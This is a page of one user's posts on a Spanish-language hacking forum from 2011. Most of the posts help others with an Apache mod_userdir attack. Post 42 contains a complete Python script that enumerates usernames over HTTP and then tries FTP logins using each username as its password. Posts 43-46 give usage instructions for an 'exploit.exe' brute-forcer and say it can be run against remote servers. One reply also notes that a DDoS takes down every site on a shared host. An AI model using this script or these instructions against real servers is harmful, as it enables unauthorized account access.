elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19
41  Seguridad Informática / Bugs y Exploits / Re: mod_userdir Apache en: 12 Octubre 2011, 22:38 pm
Lo pegas en un archivo y le das permisos de ejecucion al archivo, estas en linux no?
Tenes que tener python instalado.
42  Seguridad Informática / Bugs y Exploits / Re: mod_userdir Apache en: 12 Octubre 2011, 21:30 pm
El problema esta adentro de la funcion trylogonFTP()

Lo que tiene que hacer es simple, escribirlo en C es romperse la cabeza... ni conviene ponerse a ver donde se cuelga (que debe ser en algun recv)

Aca te hice uno que hace lo mismo pero en python. Menos lineas y muuucho mas facil de entender/corregir/mantener/mejorar/etc...

Código
  1. #!/usr/bin/python
  2. import sys
  3. import httplib
  4. from ftplib import FTP
  5.  
  6. def usage():
  7. print "Usage:"
  8. print sys.argv[0] + " localhost users.txt"
  9. return
  10.  
  11. if len(sys.argv) < 3:
  12. print "#ERROR# Not enough arguments"
  13. usage()
  14. exit()
  15.  
  16. host = sys.argv[1]
  17. fusers = sys.argv[2]
  18.  
  19. # Abrir archivo con usuarios
  20. users = open(fusers, 'r')
  21.  
  22. print "Search for http users"
  23.  
  24. # Intentar conexiones por http y guardar los usuarios validos
  25. valid_users = []
  26. for user in users:
  27. user = user.strip()
  28. if not user:
  29. continue
  30.  
  31. # Conectarse al servidor http
  32. conn = httplib.HTTPConnection(host)
  33. # Probar con el usuario user
  34. print "Trying user " + user + " ...",
  35. conn.request("GET", "/~{0}".format(user))
  36.  
  37. res = conn.getresponse()
  38. if res.status == 404: # respuesta 404
  39. print "not found"
  40. else:
  41. print "OK!"
  42. # Salvar usuario
  43. valid_users.append(user)
  44.  
  45. # Salir si no se encontro ningun usuario
  46. if len(valid_users) == 0:
  47. print "No user has been found. Aborting!"
  48. exit()
  49.  
  50. # Probar por ftp ahora
  51. print "Try login to ftp server"
  52. for vuser in valid_users:
  53. print "Trying user " + vuser + "...",; sys.stdout.flush()
  54. try:
  55. ftp = FTP(host, user = vuser, passwd = vuser)
  56. ftp.quit()
  57. print "OK!"
  58. except:
  59. print "refused"
  60.  

Copialo y pegalo. Le pasas el host y el nombre del archivo como parametros. Espero te sirva

Saludos!
43  Seguridad Informática / Bugs y Exploits / Re: mod_userdir Apache en: 7 Octubre 2011, 20:54 pm
Sólo una cosa, ¿puedo usar el exploit desde este ordenador, por ejemplo, e intentar atacar un server alojado en otro ordenador que contiene el archivo con los usuarios? ¿O este archivo tiene que estar obligatoriamente en el misma carpeta que exploit.exe?
El archivo tiene que estar obligatoriamente en la misma carpeta que el exploit.exe
Pero podes lanzar el ataque contra un server remoto sin problemas, usando el archivo en local, es la idea principal del bruteforce.

Saludos!
44  Seguridad Informática / Bugs y Exploits / Re: mod_userdir Apache en: 7 Octubre 2011, 20:28 pm
Detalle, la opcion -f hace que exploit.exe intente hacer un bruteforce sobre el puerto 21(ftp). Sacale el -f si queres que ataque el puerto 80.
Con respecto a la direccion, localhost equivale a 127.0.0.1 y no a 192.168.1.1. Pone esa direccion sino, porque puede ser que el servidor http no este bindeado a localhost.
45  Seguridad Informática / Bugs y Exploits / Re: mod_userdir Apache en: 7 Octubre 2011, 08:36 am
Al final encontré el archivo mod_userdir en la carpeta de Apache, y tiene extensión ".so".
¿Tengo que poner simplemente ésto para atacar mi server?

exploit.exe -f -h localhost -u mod_userdir.so

No, en -u tenes que poner un archivo de texto que contenga los nombres de usuario. Por ej suponete que en el archivo users.txt tenes esto

Código:
admin
goku
neo
luke
kirk
elbrujo

Guarda el archivo users.txt en el mismo lugar donde ejecutas exploit y proba con esto:
Código
  1. exploit.exe -f -h localhost -u users.txt
46  Seguridad Informática / Bugs y Exploits / Re: mod_userdir Apache en: 4 Octubre 2011, 08:35 am
Hola SySc0d3r,

No es un exploit, es un bruteforce. Lo podes testear en localhost siempre y cuando tengas alguno de los servers que ataca:
- Apache con mod_userdir
- FTP
- POP3
Con la opcion -u le pasas un archivo con la lista de usuarios para el bruteforce, uno por linea.

Código
  1. exploit.exe -f -h localhost -u archivo_con_usuarios.txt

Saludos
47  Seguridad Informática / Bugs y Exploits / Re: ayuda con DEP problema al querer correr un bof en: 28 Septiembre 2011, 09:36 am
Hola qqmelo,

Podrias pegar el codigo asm aca? Para ver las protecciones que podes llegar a tener.
48  Seguridad Informática / Bugs y Exploits / Re: Dropbear SSH Server en: 16 Septiembre 2011, 14:15 pm
Que version de dropbear tenes?
49  Seguridad Informática / Nivel Web / Re: ¿Un DDOS afecta solamente al sitio que se tiene de objetivo? en: 6 Septiembre 2011, 08:34 am
Una duda tengo. Si se hace un DDOS a una direccion de sitio web, ¿se caen todos los sitios alojados en el mismo servidor, o solo el sitio? La lógica me dice que sí, pero quiero asegurarme según sus comentarios.

Gracias che.
Si, se caen todos los sitios de ese servidor. O sea, saturas el daemon httpd para que no acepte mas pedidos legitimos, sea el dominio que sea que este manejando.

Saludos
50  Foros Generales / Noticias / Re: Microsoft plantea un navegador sin complementos gracias a HTML5 en: 5 Septiembre 2011, 21:26 pm
No more flash dentro de poco tiempo? El sueño de Steve Jobs se hace realidad xD
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines